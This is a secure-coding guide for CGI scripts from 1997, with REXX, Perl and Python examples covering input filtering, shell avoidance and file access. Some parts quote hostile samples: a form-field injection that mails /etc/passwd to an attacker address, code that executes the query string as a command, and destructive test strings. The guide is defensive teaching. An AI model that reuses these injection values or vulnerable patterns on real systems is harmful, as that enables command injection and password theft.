Writing More Secure CGI Scripts

Last Update: December 2, 1997. Translated into: German ¹, Ukrainian ², Danish ³, Czech ⁴

Any time that a program such as a WWW server is interacting with a networked client such as a WWW browser, there is the possibility of that client attacking the program to gain unauthorized access. Even the most innocent looking script can be very dangerous to the integrity of your system.

With that in mind, I would like to present a few guidelines to help your program withstand such attacks. This presentation uses examples from REXX and Perl; however, the principles apply to most languages.

You may also want to look at Paul Phillips' CGI Security for information on Perl, C and C++. Another source of information is Lincoln Stein's well-regarded WWW Security FAQ. If you are using Perl then you should also consider using Perl's taint checking mechanism. If you are writing scripts for a Windows NT server then see Somarsoft - Windows NT Security Issues.

Beware the Interpret statement
Languages like REXX, the Bourne shell and Perl provide an Interpret command or equivalent (e.g. eval in the Bourne shell) which allows you to construct a string and have the interpreter execute that string. This can be very dangerous. For example, observe the following statements in a REXX script:
INTERPRET TRANSLATE(GETENV('QUERY_STRING'),' ','+')
or
ADDRESS UNIX TRANSLATE(GETENV('QUERY_STRING'),' ','+')
These clever little snippets take the query string and convert it into a command to be executed by the Web server. Unfortunately, the user could very easily have placed in the query string a command to delete all your files, or to mail a copy of the password file to someone. You must therefore restrict which commands the system is allowed to execute in response to the input.
If a set of commands needs to be executed, you may wish to set up a table containing the acceptable commands; see below for more on this.
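The table of acceptable commands can be sketched as follows. The article's own examples are in REXX and Perl; this is a minimal Python illustration of the same principle, not the author's code. The table contents (`uptime`, `date`) and the names `ALLOWED_COMMANDS` and `command_for` are hypothetical. The point is that the query string only selects an entry; it never becomes part of the command itself.

```python
# Hypothetical allow-list: request keyword -> fixed argument vector.
# The paths and keywords are illustrative assumptions, not from the article.
ALLOWED_COMMANDS = {
    "uptime": ["/usr/bin/uptime"],
    "date": ["/bin/date", "-u"],
}


def command_for(query_string):
    """Return a copy of the fixed argv for a keyword, or None if not allowed."""
    # Mirror the article's TRANSLATE(..., ' ', '+'): '+' stands for a space.
    keyword = query_string.replace("+", " ").strip()
    argv = ALLOWED_COMMANDS.get(keyword)
    return list(argv) if argv is not None else None
```

A request for `date` yields the fixed argument list, while anything else, such as `rm+-rf+/`, yields `None` and should be refused.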
Do not trust the client to do anything
A well-behaved client will escape any characters which have special meaning to the Bourne shell in a query string. For example it may replace special characters such as a semicolon (;) or a greater-than sign (>) with "%XX" where XX is the ASCII code for the character in hexadecimal. This helps to avoid problems with your script misinterpreting the characters when they are used to construct the arguments of a command to be executed (for example, via the REXX ADDRESS UNIX command or the Perl system() command) in the server's environment (for example the Bourne shell in Unix).
A mischievous client may use special characters to confuse your script and gain unauthorized access. For example the following line may be present in a form-mail program:
system("/usr/lib/sendmail -t $form_address < $input_file");
The problem is that system starts a subshell, and there is no guarantee that the $form_address variable has not been manipulated by a mischievous client. Consider the following value for $form_address:
"legit-id@good.box.com;mail wily-cracker@evil.box.com < /etc/passwd"
In this case the wily-cracker has used the semicolon to append a command to mail to herself the system's password file.
The CGI script should therefore be careful to accept only the subset of characters which will not confuse your script. A reasonable subset is [0-9] [a-z] [A-Z] -_./@ Any other characters should be treated with care and, in general, be rejected. The same goes for escaped characters after they have been converted. You may wish to review the following REXX code fragments, or for C and Perl review How to Remove Meta-characters from User-Supplied Data in CGI Scripts, to see how to verify that a string contains only acceptable characters.
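As a rough illustration of the character check, here is a minimal sketch in Python (used here only for illustration; the article's own fragments are in REXX, C and Perl). The function names `is_safe` and `is_safe_after_decoding` are hypothetical. The pattern accepts exactly the subset suggested above and rejects everything else, including the empty string.

```python
import re
from urllib.parse import unquote

# Exactly the subset suggested in the text: digits, letters, and - _ . / @
SAFE_CHARS = re.compile(r"[0-9a-zA-Z_./@-]+")


def is_safe(value):
    """True only if every character of value is in the accepted subset."""
    return SAFE_CHARS.fullmatch(value) is not None


def is_safe_after_decoding(raw_value):
    """Convert %XX escapes first, then apply the same check."""
    return is_safe(unquote(raw_value))
```

With this check, the address `legit-id@good.box.com` is accepted, while the semicolon-laden value from the form-mail example is rejected, whether the semicolon arrives literally or escaped as `%3B`.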
Be careful with popen, system, ADDRESS UNIX etc.
The general rule is that you should not fork a subshell if the CGI script is passing untrusted data to it. In Perl you can fork subshells with the system command, commands with backticks (for example `program $args`;), the exec statement (for example exec("program $args");), and by opening a pipe (for example open(OUT, "|program $prog-args");). In REXX the usual way to fork a subshell is to use the ADDRESS UNIX or POPEN commands. Do not pass untrusted data to the shell, and when you run an external program with arguments, check the arguments first to ensure they do not contain metacharacters.
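To make the "no subshell" rule concrete, here is a minimal Python sketch (Python is an assumption of this example; the article discusses Perl and REXX). Passing the program and its arguments as a list runs the program directly, so no shell ever parses the untrusted value. The helper name `run_without_shell` is hypothetical, and the child program is a stand-in that simply prints its first argument.

```python
import subprocess
import sys


def run_without_shell(argv):
    """Run argv directly (no shell) and return its standard output as text."""
    result = subprocess.run(argv, capture_output=True, text=True, check=True)
    return result.stdout


# Untrusted value containing shell metacharacters.
hostile = "legit-id@good.box.com;echo INJECTED"

# Stand-in child program: prints its first argument and nothing else.
child = [sys.executable, "-c", "import sys; print(sys.argv[1])", hostile]
output = run_without_shell(child)
```

Because no shell is involved, the semicolon reaches the child as an ordinary character in a single argument instead of starting a second command. The argument should still be checked, since the called program may itself give meaning to some characters.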
It appears to be possible to avoid UNIX Bourne shell metacharacter expansions (such as piping (|), commands in backticks (`), redirection (>, >>, <, etc.), multiple commands (;), or filename expansions (using *, ?, [], etc.)) by placing the parameters for the UNIX command into environment variables. For example in Uni-REXX you could replace
ADDRESS UNIX 'finger' username
by
Fail=PUTENV("PARM1="username); ADDRESS UNIX 'finger "$PARM1"'
Note that we have not exhaustively tested this on multiple platforms, and there may be some hacks that will defeat this protection.
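The environment-variable technique can be tried out with a small Python sketch. This is not the author's test; it assumes a POSIX shell at `/bin/sh`, and the helper name `run_with_env_parameter` is hypothetical. The command text handed to the shell is a constant; the untrusted value travels only in the environment and is expanded inside double quotes.

```python
import os
import subprocess


def run_with_env_parameter(shell_command, value):
    """Run a fixed shell command with the untrusted value placed in $PARM1."""
    env = dict(os.environ, PARM1=value)
    result = subprocess.run(
        ["/bin/sh", "-c", shell_command],  # assumes a POSIX sh at this path
        env=env,
        capture_output=True,
        text=True,
        check=True,
    )
    return result.stdout


# Value containing a command separator, backticks and a wildcard.
hostile = "nobody; echo INJECTED `echo x` *"
echoed = run_with_env_parameter('printf "%s" "$PARM1"', hostile)
```

In this sketch the shell hands the value to `printf` unchanged. As the note above cautions, this has not been tested exhaustively, and a value beginning with a minus sign could still be read as an option by the called program.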
Some versions of REXX (including Uni-REXX) also allow you to avoid shell expansions by using
ADDRESS COMMAND 'finger' username
instead of
ADDRESS UNIX 'finger' username.
If ADDRESS COMMAND is available and avoids the shell expansion, then it should be used whenever possible, and should be made the default by placing an ADDRESS COMMAND statement near the beginning of the script.
If the above mechanisms are not available then be sure to place backslashes before any characters that have special meaning to the Bourne shell before calling the program. This can be achieved easily with a short C function. See the sample REXX and Perl code fragments for how to accomplish this.
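For comparison, Python's standard library offers `shlex.quote`, which protects a value by wrapping it in single quotes rather than by inserting backslashes. This is a different technique from the backslash escaping described above, shown here only as a minimal sketch of the same goal; the helper name `shell_quote_args` is hypothetical.

```python
import shlex


def shell_quote_args(args):
    """Join arguments into one shell command line, quoting each as needed."""
    return " ".join(shlex.quote(arg) for arg in args)


# The second argument contains a command separator and spaces.
command = shell_quote_args(["finger", "nobody; rm -rf /"])
```

The resulting string is `finger 'nobody; rm -rf /'`, so a Bourne shell sees the hostile text as a single argument to finger. Quoting of this kind targets POSIX shells only; avoiding the shell altogether remains the safer choice.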
It is good practice to allow execution of only a very limited set of commands by the CGI script. This set might be selected from a table of allowed commands. See the REXX example for how this might be accomplished. This mechanism is utilized in SLAC's CGI Security Wrapper.
Turn off server-side includes
If your server is unfortunate enough to support server-side includes, turn them off for your script directories! Server-side includes can be abused by clients that prey on scripts which directly output whatever they have been sent.
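Where a script must echo something the client sent, one complementary precaution (an addition of this sketch, not a substitute for turning includes off) is to escape the markup characters before output, so that an include directive in the input is no longer recognizable as one. A minimal Python illustration, with the hypothetical helper name `echo_safely`:

```python
import html


def echo_safely(user_text):
    """Escape &, <, > and quotes so echoed input cannot form a directive."""
    return html.escape(user_text)


# A client-supplied string shaped like a server-side include directive.
echoed = echo_safely('<!--#exec cmd="ls" -->')
```

After escaping, the text is displayed to the reader as typed but no longer begins with the `<!--#` sequence that a server would look for.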
Restrict Access to Files
Be careful to ensure that any file contents that you display are appropriate. For example, if the script receives a request from a form or a URL to display part or all of a particular file, the script should first verify (e.g. against a list or the httpd configuration file) that this file is appropriate to make visible via WWW.
Avoid allowing the client to access files higher up the directory chain by blocking the use of .. in the filename.
Avoid the server misinterpreting a filename for options (which might result in the process hanging awaiting standard input since no filename is found) by checking that the filename does not start with a minus sign (-).
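The three filename checks above can be combined in one function. The following is a minimal Python sketch rather than the article's own code; the list `VISIBLE_FILES` and the name `is_displayable` are hypothetical.

```python
import posixpath

# Hypothetical list of files that are appropriate to make visible.
VISIBLE_FILES = {"docs/readme.txt", "docs/faq.txt"}


def is_displayable(filename):
    """Apply the three checks from the text to a requested filename."""
    # Reject empty names and names that could be mistaken for options.
    if not filename or filename.startswith("-"):
        return False
    # Block any attempt to climb the directory chain.
    if ".." in filename.split("/"):
        return False
    # Finally, the file must appear on the list of visible files.
    return posixpath.normpath(filename) in VISIBLE_FILES
```

A request for `docs/faq.txt` passes, while `../etc/passwd`, `-rf` and any file not on the list are refused.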
Restricting Distribution of Information
The IP address of the client is available to the CGI script in the environment variable REMOTE_ADDR. This may be used by the script to refuse the request if the client's IP address does not match some requirements.
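A check of this kind might look like the following minimal Python sketch. The permitted network (a range reserved for documentation) and the names `ALLOWED_NETWORKS` and `client_is_allowed` are assumptions of the example; a real script would substitute its own requirements.

```python
import ipaddress
import os

# Hypothetical requirement: only clients on this network are served.
ALLOWED_NETWORKS = [ipaddress.ip_network("192.0.2.0/24")]


def client_is_allowed(environ=os.environ):
    """True if REMOTE_ADDR parses as an address inside an allowed network."""
    raw = environ.get("REMOTE_ADDR", "")
    try:
        address = ipaddress.ip_address(raw)
    except ValueError:
        # Missing or malformed address: refuse the request.
        return False
    return any(address in network for network in ALLOWED_NETWORKS)
```

The function takes the environment as a parameter so that it can be exercised with a plain dictionary, for example `client_is_allowed({"REMOTE_ADDR": "192.0.2.17"})`, without involving the server.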
Test the script before getting the WWW server to execute it
It is very easy for an untested script to cause the server problems. For example, if the script mistakenly asks for input from the console (e.g. by executing a REXX PULL command with nothing on the stack, or by executing a REXX TRACE ?R command), the process on the server will stall. Or the script may go into an infinite loop, or continuously spawn new processes and use up all the server's process slots.
You may test the script in Unix without requiring it to be executed by the WWW server, by using the Unix setenv command to set the environment variables required, then calling your script and redirecting the output to a file. Then use your WWW browser to view the local file that was created.
At SLAC we have also set up a test WWW server at http://www.slac.stanford.edu:5080/ which should be used for testing CGI scripts before they are put on the production server.
Include a comment near the top of the script advising anyone who modifies it that CGI scripts carry security risks, and that they should first read this document (http://www.slac.stanford.edu/slac/www/resource/how-to-use/cgi-rexx/cgi-security.html).
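The same offline test can be scripted. The following is a minimal Python sketch under stated assumptions: the helper name `run_cgi_offline`, the variable values and the ten-second limit are hypothetical, and the "CGI script" is a stand-in one-liner. Standard input is connected to the null device and a time limit is set, so a script that waits for console input or loops forever shows up as a failure rather than a stall.

```python
import os
import subprocess
import sys
import tempfile


def run_cgi_offline(argv, query_string, output_path):
    """Run a CGI program with a hand-built environment, saving its output."""
    env = dict(
        os.environ,
        REQUEST_METHOD="GET",
        QUERY_STRING=query_string,
        REMOTE_ADDR="127.0.0.1",
    )
    with open(output_path, "w") as out:
        subprocess.run(
            argv,
            env=env,
            stdin=subprocess.DEVNULL,  # no console to wait on
            stdout=out,
            timeout=10,                # catches infinite loops
            check=True,
        )


# Stand-in CGI script: emits a header, a blank line, then the query string.
script = (
    "import os; print('Content-type: text/plain'); print(); "
    "print(os.environ['QUERY_STRING'])"
)
output_path = os.path.join(tempfile.mkdtemp(), "out.html")
run_cgi_offline([sys.executable, "-c", script], "name=test", output_path)
with open(output_path) as saved:
    page = saved.read()
```

The saved file can then be opened in a browser or inspected directly, as described above.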
Don't Expose the script unnecessarily
If possible set the access control to the script so it is executable by your WWW server, but not world readable. For example:
- do not save the script in your public_html or any part of your file space that is visible to the Web (e.g. at SLAC do not put it under /afs/slac/www/);
- if under AFS, then Access Control Lists (ACL) should restrict access to the maintainer(s) and the WWW server.
This will reduce the possibility of a cracker reviewing your script to discover vulnerabilities.
Also remember to delete any old/backup copies that may be created automatically by an editor such as emacs, and which may still be visible and executable by the server. One way to avoid creating backup copies in the directory that the server executes from is to keep and edit the actual script in another directory, and place a symbolic link to it in the directory the server executes from.
Beware of World Writeable Files
Some scripts require reading and updating a file (e.g. to keep track of the number of times the script was called). If this file is world writeable, then care must be taken before using the results in the file, to ensure the contents of the file have not been corrupted maliciously.
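For the call-counter example, checking the file contents before use might look like this minimal Python sketch. The function name `parse_counter`, the upper bound, and the choice to fall back to zero on bad data are all assumptions of the example.

```python
def parse_counter(text, maximum=10**9):
    """Return the counter value, or 0 if the contents look corrupted."""
    stripped = text.strip()
    # Reject anything over-long before attempting a conversion.
    if len(stripped) > len(str(maximum)):
        return 0
    # Accept plain ASCII digits only; no signs, spaces or other characters.
    if not stripped.isascii() or not stripped.isdigit():
        return 0
    value = int(stripped)
    return value if value <= maximum else 0
```

The value read from the file is thus never passed on to other code, or echoed to the client, unless it is a plain number within the expected range.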


¹ Translated into German by Fijavan Brenk
² Translated into Ukrainian by Oksana Mikhailuk, hosted by www.everycloudtech.com
³ Translated into Danish by Mille Eriksen.
⁴ Translated into Czech by Barbora Lebedova

This page evolved from information from Rob McCool robm@ncsa.uiuc.edu. Also I have gained many insights and useful information from John Halperin@slac.stanford.edu.

Les Cottrell